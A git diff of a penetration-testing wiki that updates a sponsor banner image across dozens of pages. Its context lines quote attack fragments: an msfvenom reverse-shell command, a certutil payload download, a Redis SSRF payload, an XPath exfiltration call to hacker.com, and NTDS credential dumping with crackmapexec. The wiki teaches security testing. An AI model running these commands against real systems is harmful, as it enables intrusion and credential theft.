diff --git a/README.md b/README.md
index dee143b81..35b2e9a6d 100644
--- a/README.md
+++ b/README.md
@@ -61,7 +61,7 @@ Get Access Today:
### [HACKENPROOF](https://bit.ly/3xrrDrL)
-
+
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md
index 0707195de..bdc0438b8 100644
--- a/generic-methodologies-and-resources/pentesting-wifi/README.md
+++ b/generic-methodologies-and-resources/pentesting-wifi/README.md
@@ -302,7 +302,7 @@ So broken and disappeared that I am not going to talk about it. Just know that _
.png>)
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -812,7 +812,7 @@ This works like an Evil-Twin but for Wi-Fi direct, you can impersonate a group o
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/shells/msfvenom.md
index 77f446333..316ee6ee7 100644
--- a/generic-methodologies-and-resources/shells/msfvenom.md
+++ b/generic-methodologies-and-resources/shells/msfvenom.md
@@ -17,7 +17,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -195,7 +195,7 @@ msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f
```
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md
index e3b72896d..7aed21b3a 100644
--- a/generic-methodologies-and-resources/shells/windows.md
+++ b/generic-methodologies-and-resources/shells/windows.md
@@ -14,7 +14,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -328,7 +328,7 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -584,7 +584,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md
index 8bffeeb69..27fc99859 100644
--- a/linux-hardening/linux-privilege-escalation-checklist.md
+++ b/linux-hardening/linux-privilege-escalation-checklist.md
@@ -12,7 +12,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -164,7 +164,7 @@
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md
index 71e44fe47..104b903ae 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/README.md
@@ -12,7 +12,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -457,7 +457,7 @@ launchctl print gui//com.company.launchagent.label
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -1268,7 +1268,7 @@ sudo killall -HUP mDNSResponder
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md
index 6644d368d..973da9935 100644
--- a/mobile-pentesting/android-app-pentesting/README.md
+++ b/mobile-pentesting/android-app-pentesting/README.md
@@ -13,7 +13,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -63,7 +63,7 @@ adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
```
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -257,7 +257,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -511,7 +511,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -724,7 +724,7 @@ It is able to:
Useful to detect malware: [https://koodous.com/](https://koodous.com)
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -809,7 +809,7 @@ For more information visit:
* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md
index 099a6d6c9..5f9d40d4e 100644
--- a/mobile-pentesting/android-app-pentesting/android-applications-basics.md
+++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md
@@ -13,7 +13,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -134,7 +134,7 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers
**Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term “Smali” to refer to instructions. If you’ve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**.
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -466,7 +466,7 @@ MDM or Mobile Device Management are software suits that are used to **ensure a c
Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data.
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md
index 4ca67bd73..604c2ff7f 100644
--- a/network-services-pentesting/135-pentesting-msrpc.md
+++ b/network-services-pentesting/135-pentesting-msrpc.md
@@ -13,7 +13,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -109,7 +109,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md
index 21c2123ba..cd4bcf79d 100644
--- a/network-services-pentesting/27017-27018-mongodb.md
+++ b/network-services-pentesting/27017-27018-mongodb.md
@@ -13,7 +13,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -126,7 +126,7 @@ The tool [https://github.com/andresriancho/mongo-objectid-predict](https://githu
If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**.
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md
index 52e8abeee..67d70a028 100644
--- a/network-services-pentesting/5985-5986-pentesting-winrm.md
+++ b/network-services-pentesting/5985-5986-pentesting-winrm.md
@@ -14,7 +14,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -167,7 +167,7 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -336,7 +336,7 @@ Entry_2:
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md
index 1b409f18b..39d893e15 100644
--- a/network-services-pentesting/6000-pentesting-x11.md
+++ b/network-services-pentesting/6000-pentesting-x11.md
@@ -17,7 +17,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -165,7 +165,7 @@ Now as can be seen below we have complete system access:
* `port:6000 x11`
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md
index e64663364..63e946fd1 100644
--- a/network-services-pentesting/6379-pentesting-redis.md
+++ b/network-services-pentesting/6379-pentesting-redis.md
@@ -13,7 +13,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -152,7 +152,7 @@ HGET
**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -335,7 +335,7 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit
_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
index 0669ad475..c424fe7f0 100644
--- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
+++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
@@ -13,7 +13,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -186,7 +186,7 @@ curl http://127.0.0.1:80
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
index 0bd194a18..285fc7e94 100644
--- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -13,7 +13,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -386,7 +386,7 @@ It's possible to **load a .NET dll within MSSQL with custom functions**. This, h
There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -534,7 +534,7 @@ You probably will be able to **escalate to Administrator** following one of thes
* [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md
index caa3625b2..36f5a34da 100644
--- a/network-services-pentesting/pentesting-ntp.md
+++ b/network-services-pentesting/pentesting-ntp.md
@@ -13,7 +13,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -95,7 +95,7 @@ Entry_2:
```
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
index b9c6a6d0a..52dea0107 100644
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -13,7 +13,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -190,7 +190,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
***
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -597,7 +597,7 @@ with open(PASS_LIST, "r") as f:
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md
index a135e2dfb..e86955795 100644
--- a/pentesting-web/file-inclusion/README.md
+++ b/pentesting-web/file-inclusion/README.md
@@ -13,7 +13,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -429,7 +429,7 @@ It's also possible to get RCE in a vulnerable "assert" statement using the syste
Be sure to URL-encode payloads before you send them.
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -627,7 +627,7 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha
{% file src="../../.gitbook/assets/en-local-file-inclusion-1.pdf" %}
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/pentesting-web/reset-password.md b/pentesting-web/reset-password.md
index 067dcf2fd..f304430ca 100644
--- a/pentesting-web/reset-password.md
+++ b/pentesting-web/reset-password.md
@@ -12,7 +12,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -326,7 +326,7 @@ The **reset tokens must have an expiration time**, after it the token shouldn't
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/pentesting-web/xpath-injection.md b/pentesting-web/xpath-injection.md
index a6fe31bbc..8c0dcff0b 100644
--- a/pentesting-web/xpath-injection.md
+++ b/pentesting-web/xpath-injection.md
@@ -13,7 +13,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -84,7 +84,7 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
| //title\[@\*] | Selects all title elements which have at least one attribute of any kind |
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -327,7 +327,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection)
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md
index 2c8cd69ff..1ff786f32 100644
--- a/windows-hardening/active-directory-methodology/asreproast.md
+++ b/windows-hardening/active-directory-methodology/asreproast.md
@@ -17,7 +17,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -86,7 +86,7 @@ Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbos
[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
diff --git a/windows-hardening/stealing-credentials/README.md b/windows-hardening/stealing-credentials/README.md
index 4f006fce6..b68010277 100644
--- a/windows-hardening/stealing-credentials/README.md
+++ b/windows-hardening/stealing-credentials/README.md
@@ -14,7 +14,7 @@
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -170,7 +170,7 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
```
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
@@ -342,7 +342,7 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco
-
+
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
.png)
.png)